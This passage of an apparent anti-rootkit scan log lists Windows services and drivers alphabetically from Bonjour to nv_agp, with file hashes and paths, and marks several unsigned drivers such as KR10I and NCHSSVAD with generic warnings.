13:29:08.0730 4240	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
13:29:08.0753 4240	Bonjour Service - ok
13:29:08.0850 4240	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
13:29:08.0967 4240	bowser - ok
13:29:08.0994 4240	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
13:29:09.0031 4240	BrFiltLo - ok
13:29:09.0050 4240	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
13:29:09.0101 4240	BrFiltUp - ok
13:29:09.0224 4240	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
13:29:09.0274 4240	Browser - ok
13:29:09.0300 4240	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
13:29:09.0391 4240	Brserid - ok
13:29:09.0485 4240	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
13:29:09.0572 4240	BrSerWdm - ok
13:29:09.0611 4240	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
13:29:09.0709 4240	BrUsbMdm - ok
13:29:09.0732 4240	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
13:29:09.0821 4240	BrUsbSer - ok
13:29:09.0851 4240	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
13:29:09.0921 4240	BTHMODEM - ok
13:29:10.0212 4240	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
13:29:10.0337 4240	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
13:29:10.0338 4240	BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
13:29:10.0342 4240	catchme - ok
13:29:10.0472 4240	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
13:29:10.0546 4240	cdfs - ok
13:29:10.0610 4240	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
13:29:10.0664 4240	cdrom - ok
13:29:10.0831 4240	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:29:10.0856 4240	CertPropSvc - ok
13:29:11.0084 4240	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
13:29:11.0155 4240	circlass - ok
13:29:11.0399 4240	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
13:29:11.0419 4240	CLFS - ok
13:29:11.0664 4240	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:29:11.0679 4240	clr_optimization_v2.0.50727_32 - ok
13:29:11.0965 4240	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:29:11.0982 4240	clr_optimization_v4.0.30319_32 - ok
13:29:12.0097 4240	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
13:29:12.0139 4240	CmBatt - ok
13:29:12.0262 4240	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
13:29:12.0276 4240	cmdide - ok
13:29:12.0359 4240	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
13:29:12.0374 4240	Compbatt - ok
13:29:12.0381 4240	COMSysApp - ok
13:29:12.0404 4240	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
13:29:12.0418 4240	crcdisk - ok
13:29:12.0464 4240	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
13:29:12.0587 4240	Crusoe - ok
13:29:12.0695 4240	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
13:29:12.0736 4240	CryptSvc - ok
13:29:12.0824 4240	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:29:12.0902 4240	DcomLaunch - ok
13:29:12.0953 4240	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
13:29:13.0008 4240	DfsC - ok
13:29:13.0207 4240	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
13:29:13.0372 4240	DFSR - ok
13:29:13.0869 4240	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
13:29:13.0924 4240	Dhcp - ok
13:29:14.0155 4240	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
13:29:14.0172 4240	disk - ok
13:29:14.0450 4240	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
13:29:14.0465 4240	dldtCATSCustConnectService - ok
13:29:14.0474 4240	dldt_device - ok
13:29:14.0536 4240	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
13:29:14.0642 4240	Dnscache - ok
13:29:14.0809 4240	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
13:29:14.0865 4240	dot3svc - ok
13:29:14.0930 4240	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
13:29:14.0984 4240	DPS - ok
13:29:15.0028 4240	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
13:29:15.0053 4240	drmkaud - ok
13:29:15.0276 4240	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
13:29:15.0308 4240	DXGKrnl - ok
13:29:15.0411 4240	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
13:29:15.0469 4240	E1G60 - ok
13:29:15.0597 4240	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
13:29:15.0675 4240	EapHost - ok
13:29:15.0786 4240	Ecache  (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
13:29:15.0805 4240	Ecache - ok
13:29:15.0949 4240	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
13:29:15.0990 4240	ehRecvr - ok
13:29:16.0031 4240	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
13:29:16.0109 4240	ehSched - ok
13:29:16.0131 4240	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
13:29:16.0146 4240	ehstart - ok
13:29:16.0296 4240	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
13:29:16.0339 4240	ElbyCDIO - ok
13:29:16.0379 4240	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
13:29:16.0392 4240	ElbyDelay - ok
13:29:16.0474 4240	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
13:29:16.0494 4240	elxstor - ok
13:29:16.0635 4240	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
13:29:16.0740 4240	EMDMgmt - ok
13:29:16.0815 4240	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
13:29:16.0874 4240	EventSystem - ok
13:29:16.0931 4240	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
13:29:16.0989 4240	exfat - ok
13:29:17.0097 4240	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
13:29:17.0123 4240	fastfat - ok
13:29:17.0190 4240	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
13:29:17.0288 4240	fdc - ok
13:29:17.0323 4240	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
13:29:17.0456 4240	fdPHost - ok
13:29:17.0497 4240	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
13:29:17.0556 4240	FDResPub - ok
13:29:17.0682 4240	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
13:29:17.0699 4240	FileInfo - ok
13:29:17.0730 4240	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
13:29:17.0774 4240	Filetrace - ok
13:29:17.0805 4240	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
13:29:17.0886 4240	flpydisk - ok
13:29:17.0938 4240	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
13:29:17.0957 4240	FltMgr - ok
13:29:18.0398 4240	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
13:29:18.0470 4240	FontCache - ok
13:29:18.0590 4240	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
13:29:18.0604 4240	FontCache3.0.0.0 - ok
13:29:18.0671 4240	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
13:29:18.0765 4240	Fs_Rec - ok
13:29:18.0825 4240	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
13:29:18.0841 4240	gagp30kx - ok
13:29:18.0876 4240	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
13:29:18.0890 4240	GEARAspiWDM - ok
13:29:19.0004 4240	Giraffic - ok
13:29:19.0275 4240	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
13:29:19.0337 4240	gpsvc - ok
13:29:19.0397 4240	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
13:29:19.0414 4240	gusvc - ok
13:29:19.0710 4240	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
13:29:19.0786 4240	HdAudAddService - ok
13:29:19.0984 4240	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
13:29:20.0059 4240	HDAudBus - ok
13:29:20.0123 4240	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
13:29:20.0213 4240	HidBth - ok
13:29:20.0263 4240	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
13:29:20.0341 4240	HidIr - ok
13:29:20.0435 4240	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
13:29:20.0527 4240	hidserv - ok
13:29:20.0676 4240	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
13:29:20.0783 4240	HidUsb - ok
13:29:21.0023 4240	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
13:29:21.0065 4240	hkmsvc - ok
13:29:21.0157 4240	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
13:29:21.0172 4240	HpCISSs - ok
13:29:21.0250 4240	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
13:29:21.0315 4240	HTTP - ok
13:29:21.0332 4240	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
13:29:21.0347 4240	i2omp - ok
13:29:21.0432 4240	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
13:29:21.0457 4240	i8042prt - ok
13:29:21.0495 4240	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
13:29:21.0514 4240	iaStorV - ok
13:29:21.0619 4240	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:29:21.0657 4240	IDriverT ( UnsignedFile.Multi.Generic ) - warning
13:29:21.0657 4240	IDriverT - detected UnsignedFile.Multi.Generic (1)
13:29:21.0856 4240	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:29:21.0979 4240	idsvc - ok
13:29:22.0113 4240	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
13:29:22.0128 4240	iirsp - ok
13:29:22.0205 4240	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
13:29:22.0293 4240	IKEEXT - ok
13:29:22.0556 4240	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
13:29:22.0772 4240	IntcAzAudAddService - ok
13:29:23.0008 4240	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
13:29:23.0024 4240	intelide - ok
13:29:23.0055 4240	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
13:29:23.0103 4240	intelppm - ok
13:29:23.0167 4240	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
13:29:23.0222 4240	IPBusEnum - ok
13:29:23.0367 4240	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
13:29:23.0416 4240	IpFilterDriver - ok
13:29:23.0558 4240	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
13:29:23.0594 4240	iphlpsvc - ok
13:29:23.0599 4240	IpInIp - ok
13:29:23.0647 4240	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
13:29:25.0505 4240	IPMIDRV - ok
13:29:25.0568 4240	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
13:29:25.0630 4240	IPNAT - ok
13:29:25.0809 4240	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
13:29:25.0856 4240	iPod Service - ok
13:29:25.0906 4240	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
13:29:25.0963 4240	IRENUM - ok
13:29:26.0101 4240	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
13:29:26.0116 4240	isapnp - ok
13:29:26.0193 4240	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
13:29:26.0213 4240	iScsiPrt - ok
13:29:26.0252 4240	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
13:29:26.0266 4240	iteatapi - ok
13:29:26.0357 4240	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
13:29:26.0372 4240	iteraid - ok
13:29:26.0437 4240	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
13:29:26.0454 4240	kbdclass - ok
13:29:26.0544 4240	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
13:29:26.0584 4240	kbdhid - ok
13:29:26.0625 4240	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:26.0670 4240	KeyIso - ok
13:29:26.0789 4240	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
13:29:26.0832 4240	KR10I ( UnsignedFile.Multi.Generic ) - warning
13:29:26.0832 4240	KR10I - detected UnsignedFile.Multi.Generic (1)
13:29:26.0877 4240	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
13:29:26.0901 4240	KR10N ( UnsignedFile.Multi.Generic ) - warning
13:29:26.0901 4240	KR10N - detected UnsignedFile.Multi.Generic (1)
13:29:26.0950 4240	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
13:29:27.0010 4240	KR3NPXP ( UnsignedFile.Multi.Generic ) - warning
13:29:27.0010 4240	KR3NPXP - detected UnsignedFile.Multi.Generic (1)
13:29:27.0173 4240	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
13:29:27.0216 4240	KSecDD - ok
13:29:27.0303 4240	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
13:29:27.0392 4240	KtmRm - ok
13:29:27.0505 4240	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
13:29:27.0572 4240	LanmanServer - ok
13:29:27.0645 4240	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
13:29:27.0689 4240	LanmanWorkstation - ok
13:29:27.0742 4240	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
13:29:27.0785 4240	lltdio - ok
13:29:27.0897 4240	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
13:29:27.0960 4240	lltdsvc - ok
13:29:28.0011 4240	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
13:29:28.0103 4240	lmhosts - ok
13:29:28.0124 4240	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
13:29:28.0154 4240	LPCFilter - ok
13:29:28.0186 4240	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
13:29:28.0201 4240	LSI_FC - ok
13:29:28.0215 4240	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
13:29:28.0258 4240	LSI_SAS - ok
13:29:28.0273 4240	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
13:29:28.0274 4240	LSI_SCSI - ok
13:29:28.0398 4240	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
13:29:28.0468 4240	luafv - ok
13:29:28.0654 4240	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
13:29:28.0671 4240	McAfee SiteAdvisor Service - ok
13:29:28.0748 4240	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
13:29:28.0765 4240	Mcx2Svc - ok
13:29:28.0913 4240	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
13:29:28.0933 4240	MDM - ok
13:29:28.0997 4240	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
13:29:29.0015 4240	megasas - ok
13:29:29.0094 4240	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:29:29.0228 4240	MMCSS - ok
13:29:29.0260 4240	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
13:29:29.0339 4240	Modem - ok
13:29:29.0372 4240	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
13:29:29.0427 4240	monitor - ok
13:29:29.0470 4240	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
13:29:29.0487 4240	mouclass - ok
13:29:29.0502 4240	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
13:29:29.0567 4240	mouhid - ok
13:29:29.0615 4240	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
13:29:29.0632 4240	MountMgr - ok
13:29:29.0677 4240	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
13:29:29.0697 4240	MpFilter - ok
13:29:29.0742 4240	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
13:29:29.0758 4240	mpio - ok
13:29:29.0810 4240	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
13:29:29.0854 4240	mpsdrv - ok
13:29:29.0929 4240	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
13:29:30.0093 4240	MpsSvc - ok
13:29:30.0140 4240	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
13:29:30.0154 4240	Mraid35x - ok
13:29:30.0230 4240	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
13:29:30.0271 4240	MRxDAV - ok
13:29:30.0336 4240	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
13:29:30.0406 4240	mrxsmb - ok
13:29:30.0433 4240	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
13:29:30.0538 4240	mrxsmb10 - ok
13:29:30.0574 4240	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
13:29:30.0591 4240	mrxsmb20 - ok
13:29:30.0632 4240	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
13:29:30.0646 4240	msahci - ok
13:29:30.0714 4240	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
13:29:30.0730 4240	msdsm - ok
13:29:30.0822 4240	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
13:29:30.0908 4240	MSDTC - ok
13:29:30.0960 4240	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
13:29:31.0008 4240	Msfs - ok
13:29:31.0035 4240	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
13:29:31.0052 4240	msisadrv - ok
13:29:31.0115 4240	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
13:29:31.0150 4240	MSiSCSI - ok
13:29:31.0155 4240	msiserver - ok
13:29:31.0208 4240	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
13:29:31.0266 4240	MSKSSRV - ok
13:29:31.0424 4240	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
13:29:31.0431 4240	MsMpSvc - ok
13:29:31.0495 4240	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
13:29:31.0550 4240	MSPCLOCK - ok
13:29:31.0569 4240	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
13:29:31.0668 4240	MSPQM - ok
13:29:31.0753 4240	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
13:29:31.0773 4240	MsRPC - ok
13:29:31.0846 4240	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
13:29:31.0867 4240	mssmbios - ok
13:29:31.0950 4240	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
13:29:31.0982 4240	MSTEE - ok
13:29:32.0039 4240	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
13:29:32.0058 4240	Mup - ok
13:29:32.0219 4240	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
13:29:32.0276 4240	napagent - ok
13:29:32.0329 4240	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
13:29:32.0348 4240	NativeWifiP - ok
13:29:32.0399 4240	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
13:29:32.0456 4240	NCHSSVAD ( UnsignedFile.Multi.Generic ) - warning
13:29:32.0456 4240	NCHSSVAD - detected UnsignedFile.Multi.Generic (1)
13:29:32.0505 4240	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
13:29:32.0534 4240	NDIS - ok
13:29:32.0578 4240	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
13:29:32.0603 4240	NdisTapi - ok
13:29:32.0639 4240	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
13:29:32.0691 4240	Ndisuio - ok
13:29:32.0809 4240	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
13:29:32.0836 4240	NdisWan - ok
13:29:32.0906 4240	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
13:29:32.0959 4240	NDProxy - ok
13:29:33.0003 4240	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
13:29:33.0046 4240	NetBIOS - ok
13:29:33.0199 4240	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
13:29:33.0275 4240	netbt - ok
13:29:33.0325 4240	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:33.0341 4240	Netlogon - ok
13:29:33.0489 4240	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
13:29:33.0546 4240	Netman - ok
13:29:33.0610 4240	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
13:29:33.0649 4240	netprofm - ok
13:29:33.0763 4240	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:29:33.0778 4240	NetTcpPortSharing - ok
13:29:33.0854 4240	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
13:29:33.0869 4240	nfrd960 - ok
13:29:33.0940 4240	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
13:29:33.0956 4240	NisDrv - ok
13:29:34.0134 4240	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
13:29:34.0156 4240	NisSrv - ok
13:29:34.0228 4240	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
13:29:34.0275 4240	NlaSvc - ok
13:29:34.0344 4240	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
13:29:34.0368 4240	Npfs - ok
13:29:34.0434 4240	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
13:29:34.0480 4240	nsi - ok
13:29:34.0546 4240	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
13:29:34.0573 4240	nsiproxy - ok
13:29:34.0983 4240	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
13:29:35.0028 4240	Ntfs - ok
13:29:35.0086 4240	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
13:29:35.0143 4240	ntrigdigi - ok
13:29:35.0206 4240	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
13:29:35.0257 4240	Null - ok
13:29:35.0280 4240	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
13:29:35.0296 4240	nvraid - ok
13:29:35.0327 4240	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
13:29:35.0342 4240	nvstor - ok
13:29:35.0422 4240	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
13:29:35.0438 4240	nv_agp - ok
